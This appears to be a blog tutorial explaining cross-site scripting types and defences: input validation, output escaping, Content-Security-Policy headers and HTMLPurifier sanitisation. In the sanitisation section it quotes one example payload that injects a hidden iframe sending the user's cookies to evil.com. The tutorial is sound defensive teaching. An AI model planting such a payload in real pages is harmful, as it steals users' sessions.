XSS: Cross Site Scripting


This is probably the most common vulnerability these days on Internet Web Apps. Consist in inject client-side scripts in web pages viewed by other users.

What is Cross-Site Scripting?

XSS occurs when an attacker is capable of injecting a script, often Javascript, into the output of a web application in such a way that it is executed in the client browser.

Even when it’s usually underestimated by developer, injected Javascript can be used to accomplish a lot of damage like: steal cookies and sessions, steal user’s entity to perform request, redirect to hostile hosts, manipulating client-side persistent storage, rewriting or manipulating in-browser applications, attacking browser extensions, and the list goes on.

Types of Cross-Site Scripting Attacks

This kind of attacks can be split in two big categories: The first lies in how malicious input navigates the web application, while the second attempt to include the malicious input within the output of current request.

  • Reflected XSS Attack: Untrusted input sent to a web application is immediately included in the application’s output. Reflection can occur with error messages, search engine submissions, comment previews, etc. This form of attack can be mounted by persuading a user to click a link or submit a form of the attacker’s choosing.
  • Stored XSS Attack: A Stored XSS attack is when the payload for the attack is stored somewhere and retrieved as users view the targeted data. While a database is to be expected, other persistent storage mechanisms can include caches and logs which also store information for long periods of time.
  • DOM-based XSS Attack: DOM-based XSS can be either reflected or stored and the differentiation lies in how the attack is targeted. Most attacks will strike at the immediate markup of a HTML document. However, HTML may also be manipulated by Javascript using the DOM. An injected payload, rendered safely in HTML, might still be capable of interfering with DOM operations in Javascript. There may also be security vulnerabilities in Javascript libraries or their usage which can also be targeted.

How to prevent

Here I will show you a list of topic you should have in mind.

Input Validation

Input Validation is any web application’s first line of defence.Validation works best by preventing XSS attacks on data which has inherent value limits. An integer, for example, should never contain HTML special characters. An option, such as a country name, should match a list of allowed countries which likewise will prevent XSS payloads from being injected.

Input Validation can also check data with clear syntax constraints.

Escaping (also Encoding)

Escaping data on output is a method of ensuring that the data cannot be misinterpreted by the currently running parser or interpreter. The method of escaping varies depending on which Content data is being injected into. The most common Contexts: HTML Body, HTML Attribute, Javascript, URL and CSS.

Content-Security Policy

The Content-Security Policy (CSP) is a HTTP header which communicates a whitelist of trusted resource sources that the browser can trust. Any source not included in the whitelist can now be ignored by the browser since it’s untrusted. Consider the following:

X-Content-Security-Policy: script-src ‘self’

This CSP header tells the browser to only trust Javascript source URLs pointing to the current domain and ignore the rest.

If we need to use Javascript from another source besides ‘self’, we can extend the whitelist to include it. For example, let’s include jQuery’s CDN address.


X-Content-Security-Policy: script-src ‘self’ http://code.jquery.com; style-src ‘self’

Browser Detection

HTML Sanitisation

At some point we might need to include external HTML without escaping it. An example of that can be blog comments.

If we were to escape the resulting HTML markup from those sources, they would never render correctly so we instead need to carefully filter it to make sure that any and all dangerous markup is neutralised.

For example:

I am a Markdown paragraph.<script>document.write(‘<iframe src=”http://evil.com?cookie=‘ + document.cookie.escape() + ‘” height=0 width=0 />’);</script>

There’s no need to panic. I swear I am just plain text!

Markdown is a popular alternative to writing HTML but it also allows authors to mix HTML into Markdown. It’s a perfectly valid Markdown feature and a Markdown renderer won’t care whether there is an XSS payload included.

In order to prevent here is an example of a PHP library: HTMLPurifier

// Basic setup without a cache
$config = HTMLPurifier_Config::createDefault();
$config->set(‘Core’, ‘Encoding’, ‘UTF-8’);
$config->set(‘HTML’, ‘Doctype’, ‘HTML 4.01 Transitional’);
// Create the whitelist
$config->set(‘HTML.Allowed’, ‘p,b,a[href],i’); // basic formatting and links
$sanitiser = new HTMLPurifier($config);
$output = $sanitiser->purify($untrustedHtml);

Final remarks and cheat sheets

Always the first step to prevent almost all kind of attack is to clean/sanitize all inputs and outputs.

Security workflow should traversal to the whole lifecycle of the project, is not just a patch we can apply at some point to fix all problems. It should be think from the design stage.

In addition to the above words, and to finish this post, I will share a couple of cheat sheets that would help you in the develop/implementation stages.